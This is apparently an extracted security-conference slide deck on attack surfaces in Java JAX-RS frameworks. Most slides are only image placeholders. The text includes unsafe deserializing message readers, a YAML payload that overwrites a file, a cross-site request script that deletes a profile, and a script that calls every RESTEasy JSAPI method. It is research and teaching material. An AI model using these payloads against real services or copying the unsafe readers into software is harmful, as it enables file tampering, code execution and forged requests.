![Page 1: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/1.jpg)
![Page 2: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/2.jpg)
2 / 99
![Page 3: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/3.jpg)
3 / 99
![Page 5: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/5.jpg)
•
•
•
•
•
5 / 99
![Page 6: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/6.jpg)
6 / 99
![Page 7: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/7.jpg)
![Page 8: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/8.jpg)
@ApplicationPath("/")
public class DummyApp extends Application {
}
8 / 99
![Page 9: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/9.jpg)
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
@GET
@Path("/echo1")
public Response queryparam(@QueryParam("value") String param) {...}
@GET
@Path("/echo2")
public Response headerparam(@HeaderParam("X-Echo") String param) {...}
@POST
@Path("/echo3")
public Response formparam(@FormParam("value") String param) {...}
@POST
@Path("/echo4")
public Response entityparam(String param) {...}
}
9 / 99
![Page 10: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/10.jpg)
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
@GET
@Path("/echo1")
public Response queryparam(@QueryParam("value") String param) {...}
@GET
@Path("/echo2")
public Response headerparam(@HeaderParam("X-Echo") String param) {...}
@POST
@Path("/echo3")
public Response formparam(@FormParam("value") String param) {...}
@POST
@Path("/echo4")
public Response entityparam(String param) {...}
}
Relative URI path for resource
10 / 99
![Page 11: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/11.jpg)
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
@GET
@Path("/echo1")
public Response queryparam(@QueryParam("value") String param) {...}
@GET
@Path("/echo2")
public Response headerparam(@HeaderParam("X-Echo") String param) {...}
@POST
@Path("/echo3")
public Response formparam(@FormParam("value") String param) {...}
@POST
@Path("/echo4")
public Response entityparam(String param) {...}
}
MIME media type
11 / 99
![Page 12: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/12.jpg)
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
@GET
@Path("/echo1")
public Response queryparam(@QueryParam("value") String param) {...}
@GET
@Path("/echo2")
public Response headerparam(@HeaderParam("X-Echo") String param) {...}
@POST
@Path("/echo3")
public Response formparam(@FormParam("value") String param) {...}
@POST
@Path("/echo4")
public Response entityparam(String param) {...}
}
Resource methods
12 / 99
![Page 13: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/13.jpg)
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
@GET
@Path("/echo1")
public Response queryparam(@QueryParam("value") String param) {...}
@GET
@Path("/echo2")
public Response headerparam(@HeaderParam("X-Echo") String param) {...}
@POST
@Path("/echo3")
public Response formparam(@FormParam("value") String param) {...}
@POST
@Path("/echo4")
public Response entityparam(String param) {...}
}
HTTP method annotations: GET, POST, PUT, DELETE, etc.
13 / 99
![Page 14: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/14.jpg)
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
@GET
@Path("/echo1")
public Response queryparam(@QueryParam("value") String param) {...}
@GET
@Path("/echo2")
public Response headerparam(@HeaderParam("X-Echo") String param) {...}
@POST
@Path("/echo3")
public Response formparam(@FormParam("value") String param) {...}
@POST
@Path("/echo4")
public Response entityparam(String param) {...}
}
Relative URI path for methods
14 / 99
![Page 15: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/15.jpg)
@Path("/rest")
@Produces(MediaType.TEXT_PLAIN)
public class DummyResource {
@GET
@Path("/echo1")
public Response queryparam(@QueryParam("value") String param) {...}
@GET
@Path("/echo2")
public Response headerparam(@HeaderParam("X-Echo") String param) {...}
@POST
@Path("/echo3")
public Response formparam(@FormParam("value") String param) {...}
@POST
@Path("/echo4")
public Response entityparam(String param) {...}
}
Is extracted from URI query parameter value
Is extracted from X-Echo header
Is extracted from body parameter value
Entity parameter (w/o annotation)
15 / 99
![Page 16: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/16.jpg)
16 / 99
![Page 17: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/17.jpg)
17 / 99
![Page 18: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/18.jpg)
18 / 99
![Page 19: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/19.jpg)
19 / 99
![Page 20: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/20.jpg)
![Page 21: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/21.jpg)
21 / 99
![Page 22: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/22.jpg)
22 / 99
![Page 23: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/23.jpg)
23 / 99
![Page 24: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/24.jpg)
24 / 99
![Page 25: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/25.jpg)
25 / 99
![Page 26: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/26.jpg)
26 / 99
![Page 27: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/27.jpg)
27 / 99
![Page 31: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/31.jpg)
</web-app>
…
<servlet>
<servlet-name>RESTEasy JSAPI</servlet-name>
<servlet-class>org.jboss.resteasy.jsapi.JSAPIServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RESTEasy JSAPI</servlet-name>
<url-pattern>/unsafe-jaxrs/resteasy/rest-js</url-pattern>
</servlet-mapping>
…
</web-app>
31 / 99
![Page 33: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/33.jpg)
<script src="http://127.0.0.1:8080/unsafe-
jaxrs/resteasy/rest-js" type="text/javascript"></script>
<script>
var resMethods = Object.getOwnPropertyNames(PoC_resource);
for (var i = 0; i < resMethods.length; i++) {
try {
PoC_resource[resMethods[i]].call(PoC_resource);
} catch (err) { ; }
}
</script>
33 / 99
![Page 34: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/34.jpg)
@Path("/rest/echo/{name:.+}")
public class PublicResource {
@GET public Response somemethod(@PathParam("name") String name)
{
return Response.status(200).entity("Public").build();
}
}
34 / 99
![Page 35: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/35.jpg)
@Path("/rest/{name}/show/{id:\\d+}")
public class PrivateResource {
@GET public Response somemethod( @PathParam("name") String name,
@PathParam("id") String id )
{
return Response.status(200).entity("Private").build();
}
}
35 / 99
![Page 36: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/36.jpg)
<?xml version="1.0" encoding="UTF-8"?>
<web-app>
<security-constraint>
<web-resource-collection>
<web-resource-name>app</web-resource-name>
<url-pattern>/rest/echo/*</url-pattern>
</web-resource-collection>
</security-constraint>
<security-constraint>
<web-resource-collection>
<web-resource-name>app</web-resource-name>
<url-pattern>/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>AuthorizedUser</role-name>
</auth-constraint>
</security-constraint>
<login-config>
<auth-method>BASIC</auth-method>
<realm-name>The Restricted Zone</realm-name>
</login-config>
…
</web-app>
36 / 99
![Page 37: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/37.jpg)
<?xml version="1.0" encoding="UTF-8"?>
<web-app>
<security-constraint>
<web-resource-collection>
<web-resource-name>app</web-resource-name>
<url-pattern>/rest/echo/*</url-pattern>
</web-resource-collection>
</security-constraint>
<security-constraint>
<web-resource-collection>
<web-resource-name>app</web-resource-name>
<url-pattern>/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>AuthorizedUser</role-name>
</auth-constraint>
</security-constraint>
<login-config>
<auth-method>BASIC</auth-method>
<realm-name>The Restricted Zone</realm-name>
</login-config>
…
</web-app>
Doesn’t require auth
Requires auth
37 / 99
![Page 38: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/38.jpg)
38 / 99
![Page 39: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/39.jpg)
39 / 99
![Page 40: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/40.jpg)
40 / 99
![Page 41: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/41.jpg)
41 / 99
![Page 42: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/42.jpg)
42 / 99
![Page 43: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/43.jpg)
43 / 99
![Page 44: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/44.jpg)
44 / 99
![Page 45: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/45.jpg)
45 / 99
![Page 46: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/46.jpg)
![Page 47: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/47.jpg)
@Provider
@Produces("*/*")
@Consumes("*/*")
public class SerializableProvider implements MessageBodyReader {
public boolean isReadable(Class<?> type, Type genericType,
Annotation[] annotations, MediaType mediaType) {
// Implementation
}
public Serializable readFrom(Class<Serializable> type,
Type genericType, Annotation[] annotations,
MediaType mediaType, MultivaluedMap<String, String> httpHeaders,
InputStream entityStream) throws Exception {
// Implementation
}
}
47 / 99
![Page 48: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/48.jpg)
48 / 99
![Page 49: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/49.jpg)
@ApplicationPath("/")
public class PoC_app extends ResourceConfig {
public PoC_app() {
}
}
49 / 99
![Page 50: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/50.jpg)
50 / 99
![Page 51: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/51.jpg)
51 / 99
![Page 52: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/52.jpg)
52 / 99
![Page 53: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/53.jpg)
53 / 99
![Page 54: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/54.jpg)
54 / 99
![Page 55: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/55.jpg)
55 / 99
![Page 56: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/56.jpg)
public boolean isReadable(Class<?> type, Type genericType,
Annotation[] annotations,
MediaType mediaType)
{
return Serializable.class.isAssignableFrom(type) &&
APPLICATION_SERIALIZABLE_TYPE.getType().equals(mediaType.getType()) &&
APPLICATION_SERIALIZABLE_TYPE.getSubtype().equals(mediaType.getSubtype());
}
56 / 99
![Page 57: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/57.jpg)
public Serializable readFrom(Class<Serializable> type, Type genericType,
Annotation[] annotations, MediaType mediaType,
MultivaluedMap<String, String> httpHeaders,
InputStream entityStream) throws Exception
{
BufferedInputStream bis = new BufferedInputStream(entityStream);
ObjectInputStream ois = new ObjectInputStream(bis);
try {
return Serializable.class.cast(ois.readObject());
} catch (ClassNotFoundException e) {
throw new WebApplicationException(e);
}
}
57 / 99
![Page 58: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/58.jpg)
@POST
@Path("/concat")
@Produces(MediaType.APPLICATION_JSON)
@Consumes({"*/*"})
public Map<String, String> doConcat(Pair pair) {
HashMap<String, String> result = new HashMap<String, String>();
result.put("Result", pair.getP1() + pair.getDelimiter() + pair.getP2());
return result;
}
58 / 99
![Page 59: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/59.jpg)
public class Pair implements Serializable {
private static final long serialVersionUID = 1L;
private String P1;
private String P2;
...
}
59 / 99
![Page 60: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/60.jpg)
60 / 99
![Page 62: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/62.jpg)
public boolean isReadable(Class<?> type, Type genericType,
Annotation[] annotations, MediaType mediaType) {
return true;
}
62 / 99
![Page 63: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/63.jpg)
String yaml = "--- !!java.io.FileOutputStream [/tmp/overwrite]";
Object o = new Yaml().load(yaml);
63 / 99
![Page 64: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/64.jpg)
--- !!java.io.FileOutputStream [/tmp/overwrite]
@POST
@Path("/concat/1")
@Produces(MediaType.TEXT_PLAIN)
public Response doConcat1( Pair p )
{
return Response.status(200).entity(p.getP1() + p.getP2()).build();
}
64 / 99
![Page 65: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/65.jpg)
list: [!!java.io.FileOutputStream [/tmp/overwrite]]
@POST
@Path("/concat/array")
@Produces(MediaType.TEXT_PLAIN)
public Response doConcat2( ArrayList<Pair> p ) {
return Response.status(200).entity(p.get(0).getP1() +
p.get(0).getP2()).build();
}
65 / 99
![Page 66: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/66.jpg)
66 / 99
![Page 68: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/68.jpg)
public boolean isReadable(final Class<?> type, final Type genericType,
final Annotation[] annotations,
final MediaType mediaType)
{
return true;
}
68 / 99
![Page 69: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/69.jpg)
69 / 99
![Page 70: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/70.jpg)
@POST
@Path("/concat")
@Produces(MediaType.APPLICATION_JSON)
@Consumes({"*/*"})
public Map<String, String> doConcat(Pair pair)
{
HashMap<String, String> result = new HashMap<String, String>();
result.put("Result", pair.getP1() + pair.getDelimiter() + pair.getP2());
return result;
}
70 / 99
![Page 71: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/71.jpg)
71 / 99
![Page 72: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/72.jpg)
http://cxf.apache.org/security-advisories.data/CVE-2016-8739.txt.asc
72 / 99
![Page 73: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/73.jpg)
public boolean isReadable(Class<?> type, Type genericType,
Annotation[] annotations,
MediaType mediaType)
{
return !String.class.equals(type) && TypeConverter.isConvertable(type);
}
73 / 99
![Page 74: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/74.jpg)
@POST
@Path("/profile/delete")
@Produces(MediaType.APPLICATION_JSON)
public Response deleteProfile(Profile profile) {
String result = "{\"status\":\"" + profile.delete() + "\"}";
return Response.status(200).entity(result).build();
}
74 / 99
![Page 75: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/75.jpg)
public class Profile {
private String DisplayName;
private String Email;
private String uid;
public Profile() {}
public Profile(String uid) {
this.uid = uid;
}
public String delete() {
// SOME LOGIC TO FIND PROFILE BY UID AND DELETE IT
return "Deleted";
}
}
75 / 99
![Page 76: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/76.jpg)
<script>
var request = new XMLHttpRequest();
var data = '12345';
request.open('POST',
'http://localhost:8080/unsafe-jaxrs/profile/delete',
true);
request.withCredentials = true;
request.setRequestHeader("Content-type", "text/plain");
request.send(data);
</script>
76 / 99
![Page 77: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/77.jpg)
77 / 99
![Page 78: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/78.jpg)
public boolean isReadable(Class<?> type, Type genericType,
Annotation[] annotations,
MediaType mediaType)
{
return type.equals(Map.class) && genericType != null && genericType
instanceof ParameterizedType;
}
78 / 99
![Page 79: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/79.jpg)
@POST
@Path("/multipart")
@Consumes(MediaType.MULTIPART_FORM_DATA)
public Response doMultipart(Map<String,String[]> map) {
return Response.ok().build();
}
79 / 99
![Page 80: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/80.jpg)
80 / 99
![Page 81: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/81.jpg)
![Page 82: Презентация PowerPoint - TROOPERS20 · Презентация PowerPoint Author: Mikhail Egorov Created Date: 3/27/2017 7:17:21 PM](https://reader030.vdocuments.mx/reader030/viewer/2022041010/5eb8c22ee54b5a0f8b677f06/html5/thumbnails/82.jpg)
82 / 99
